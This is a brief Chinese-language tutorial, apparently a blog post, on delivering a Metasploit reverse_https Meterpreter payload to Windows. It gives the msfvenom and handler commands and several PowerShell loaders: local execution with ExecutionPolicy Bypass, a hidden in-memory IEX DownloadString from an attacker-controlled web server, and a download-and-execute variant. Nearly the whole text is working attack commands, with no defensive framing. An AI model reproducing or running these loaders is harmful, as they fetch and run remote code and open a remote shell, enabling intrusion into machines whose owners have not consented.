0.加载方式

  1. 本地加载
  2. powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1
  4. 远程加载到内存中
  5. powershell.exe nop w hidden c "IEX ((NEW-object net.webclient).downloadstring('http://192.168.1.4/a.ps1'))"
  7. Powershell
  8. Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://192.168.5.1/shell.ps1")
  10. 远程加载到本地执行
  11. powershell
  12. $client = new-object System.Net.WebClient
  13. $client.DownloadFile('http://192.168.5.132/system', 'd:\\system.exe')"
  14. start-Process 'd:\\system.exe'

1. 生成马

  1. msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.4 lport=3333 -f psh -o shell.ps1

image.png

2. 监听

  1. handler -H 192.168.1.4 -P 3333 -p windows/x64/meterpreter/reverse_https

image.png

3. 执行方式

3.1 本地加载

  1. powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1

image.png
image.png

3.2 远程加载

3.2.1 搭建web

利用kali自带的apache2搭建好web环境,并将生成的shell.ps1马放到里面,确保可以下载。
web环境:http://192.168.1.4/1.ps1
image.png

3.2.2 方法一

  1. powershell.exe nop w hidden c "IEX ((NEW-object net.webclient).downloadstring('http://192.168.1.4/a.ps1'))"

image.png
image.png

3.2.2 方法二

  1. Powershell
  2. Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://192.168.5.1/shell.ps1")

image.png